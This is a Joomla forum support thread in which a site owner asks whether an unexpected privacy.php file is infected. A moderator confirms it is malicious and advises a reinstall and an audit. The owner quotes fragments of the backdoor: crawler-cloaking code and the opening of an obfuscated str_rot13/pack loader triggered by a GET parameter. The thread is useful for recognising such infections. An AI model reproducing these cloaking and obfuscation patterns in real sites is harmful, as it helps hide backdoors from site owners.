Do I need privacy.php and is it infected?

Discussion regarding Joomla! 3.x security issues.

Moderators: Bernard T, mandville, fcoulter, PhilD, General Support Moderators

Forum rules
Forum Rules
Absolute Beginner's Guide to Joomla! <-- please read before posting, this means YOU.
Forum Post Assistant / FPA - If you are serious about wanting help, you will use this tool to help you post.
Post Reply
scifivision
Joomla! Enthusiast
Joomla! Enthusiast
Posts: 170
Joined: Mon Jun 01, 2009 5:24 am

Do I need privacy.php and is it infected?

Post by scifivision » Wed Sep 18, 2019 2:34 am

Is there supposed to be a privacy.php file inside the main joomla directory? I think this may be part of an injected virus. Tech support for the server sent me flagged some questionable files. And if it's infected, before you say you need to reinstall the whole site etc. and update all the plugins, yes I know and am going to do just that, but I am trying to first understand if it's infected, exactly what it means so I can recognize this in the future. I noticed my other joomla installs didn't have the file.

Some of the code to me looks legit, but I don't know a lot about the code. This is the part I didn't know about:

Code: Select all

<?php

// Preventing a directory listing

if(!empty($_SERVER["HTTP_USER_AGENT"])) {  
I don't know what it does, so I didn't want to just delete the whole file. This code however, I'm pretty sure is bad, because you have to scroll far over to see it:

Code: Select all

$userAgents = array("Google", "Slurp", "MSNBot", "ia_archiver", "Yandex", "Rambler");

    if(preg_match("/" . implode("|", $userAgents) . "/i", $_SERVER["HTTP_USER_AGENT"])) {

        header("HTTP/1.0 404 Not Found");exit;

    }

}          
and

Code: Select all

if (isset($_GET[str_rot13(pack("H*", "6c6268737661717667"))])) {$_F=__FILE__;$_X="
and then a huge string of numbers.

If it is infected I am going to reinstall joomla and the plugins, but I want to make sure I have a backup in case I screw something up, and although it might be vulnerable still, I don't want to save an infected backup either. I'm running joomla 3.9.10

User avatar
toivo
Joomla! Master
Joomla! Master
Posts: 11478
Joined: Thu Feb 15, 2007 5:48 am
Location: Suzhou, China

Re: Do I need privacy.php and is it infected?

Post by toivo » Wed Sep 18, 2019 3:47 am

Surely infected. The only PHP files in the main Joomla directory are index.php and configuration.php. Any other PHP file there, other than the FPA script, in case it was left behind by mistake, is assumed to be malicious, like your file privacy.php, containing str_rot13 and pack statements to obfuscate the code and hide the real purpose of the script.

It is recommended to post the results of the Forum Post Assistant (FPA) by following the instructions from https://forumpostassistant.github.io/docs/ so that you would have a chance to receive advice from experts about the configuration of the web server and the site, including the third party extensions, some of which may be obsolete or reported in the Joomla! Vulnerable Extensions List (VEL) at https://vel.joomla.org/.
Toivo Talikka, Global Moderator

scifivision
Joomla! Enthusiast
Joomla! Enthusiast
Posts: 170
Joined: Mon Jun 01, 2009 5:24 am

Re: Do I need privacy.php and is it infected?

Post by scifivision » Wed Sep 18, 2019 4:24 am

Thanks I’ll figure out how to do that. I guess info.php (essentially empty) and mysql-[removed].php should be deleted too those oddly weren’t flagged.

User avatar
toivo
Joomla! Master
Joomla! Master
Posts: 11478
Joined: Thu Feb 15, 2007 5:48 am
Location: Suzhou, China

Re: Do I need privacy.php and is it infected?

Post by toivo » Wed Sep 18, 2019 4:51 am

You are right, those two files must have been uploaded just make it look legitimate and confuse the webmaster and support staff.
Toivo Talikka, Global Moderator

scifivision
Joomla! Enthusiast
Joomla! Enthusiast
Posts: 170
Joined: Mon Jun 01, 2009 5:24 am

Re: Do I need privacy.php and is it infected?

Post by scifivision » Wed Sep 18, 2019 5:32 am

Thank you. I’m going to have them scan everything, back it up just in case and then make a new install and connect the old database etc.

Question though I’ve read everywhere you should reinstall no matter what. If the virus scanner says it is clean, I take it that’s not enough? Or can you just update all the plugins? It’s just a pain if unnecessary.

User avatar
toivo
Joomla! Master
Joomla! Master
Posts: 11478
Joined: Thu Feb 15, 2007 5:48 am
Location: Suzhou, China

Re: Do I need privacy.php and is it infected?

Post by toivo » Wed Sep 18, 2019 6:21 am

Unfortunately normal virus scanners do not detect every malicious script. You should try Phil Taylor's Joomla full audit service at https://myjoomla.guru/ (no affiliation), where the first software audit is free.

Follow the advice and best practice, documented in the sticky topics of the 3.x Security forum.
Toivo Talikka, Global Moderator


Post Reply

Return to “Security in Joomla! 3.x”